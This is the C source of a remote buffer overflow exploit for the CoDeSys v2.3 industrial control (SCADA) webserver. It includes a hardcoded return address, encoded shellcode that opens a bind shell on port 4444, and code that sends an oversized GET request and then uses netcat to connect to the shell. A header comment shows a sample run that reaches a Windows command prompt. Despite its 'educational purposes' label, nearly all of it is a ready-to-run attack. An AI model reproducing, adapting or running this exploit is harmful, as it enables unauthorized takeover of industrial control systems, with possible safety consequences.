/* See Also: http://aluigi.altervista.org/adv/codesys_1-adv.txt CoDeSys v2.3 Industrial Control System Development Software Remote Buffer Overflow Exploit for CoDeSys Scada webserver Author : Celil UNUVER, SignalSEC Labs www.signalsec.com Tested on WinXP SP1 EN THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY! --snip-- root@bt:~# ./codesys 192.168.1.36 CoDeSys v2.3 webserver Remote Exploit by SignalSEC Labs - www.signalsec.com [+]Sending payload to SCADA system! [+]Connecting to port 4444 to get shell! 192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [192.168.1.36] 4444 (?) open Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Program Files\3S Software\CoDeSys V2.3\visu> --snip-- */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #define name "CoDeSys v2.3 webserver Remote Exploit" #define PORT 8080 #define JUNK "A" int main ( int argc, char *argv[] ) { int sock, i, payload; struct sockaddr_in dest_addr; char *target = "target"; char request[1600], *ptr; char ret[] = "\x67\x42\xa7\x71"; //ret - WINXP SP1 EN , mswsock.dll char hellcode[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" "\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x37" "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x58" "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58" "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x58" "\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34" "\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x38" "\x49\x58\x4e\x36\x46\x42\x4e\x41\x41\x36\x43\x4c\x41\x43\x4b\x4d" "\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48" "\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x56" "\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46" "\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x36\x47\x37\x43\x57" "\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e" "\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x50" "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" "\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x45\x43\x55\x43\x45\x43\x34" "\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x41\x31" "\x4e\x35\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a" "\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41" "\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52" "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" "\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x54\x47\x55\x4f\x4f\x48\x4d" "\x42\x55\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46" "\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55" "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36" "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x32\x4e\x4c" "\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x48\x44\x4e\x41\x33\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x52" "\x43\x39\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" "\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x34\x4f\x4f" "\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x35\x41\x35\x41\x45\x4c\x56" "\x41\x30\x41\x35\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56" "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f" "\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a"; printf ("

%s

by SignalSEC Labs - www.signalsec.com

", name); if (argc < 2) { printf ("

Usage: codesys [IP]

"); exit (-1); } setenv (target, argv[1], 1); memset (request, '\0', sizeof (request)); ptr = request; strcat (request, "GET /"); for(i = 1; i < 776; i++){ strcat (request, JUNK); } strcat (request, ret); strcat (request, hellcode); strcat (request, " HTTP/1.1"); strcat (request, "\r

"); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("

socket error

"); exit (1); } dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(PORT); if (! inet_aton(argv[1], &(dest_addr.sin_addr))) { perror("inet_aton problems"); exit (2); } memset( &(dest_addr.sin_zero), '\0', 8); if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){ perror("

Couldnt connect to target!

"); close (sock); exit (3); } payload = (send (sock, ptr, strlen(request), 0)); if (payload == -1) { perror("

Can not send the payload

"); close (sock); exit(4); } close (sock); printf ("

[+]Sending payload to SCADA system!

"); sleep (1); printf ("

[+]Connecting to port 4444 to get shell!

"); sleep (2); system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'"); exit (0); }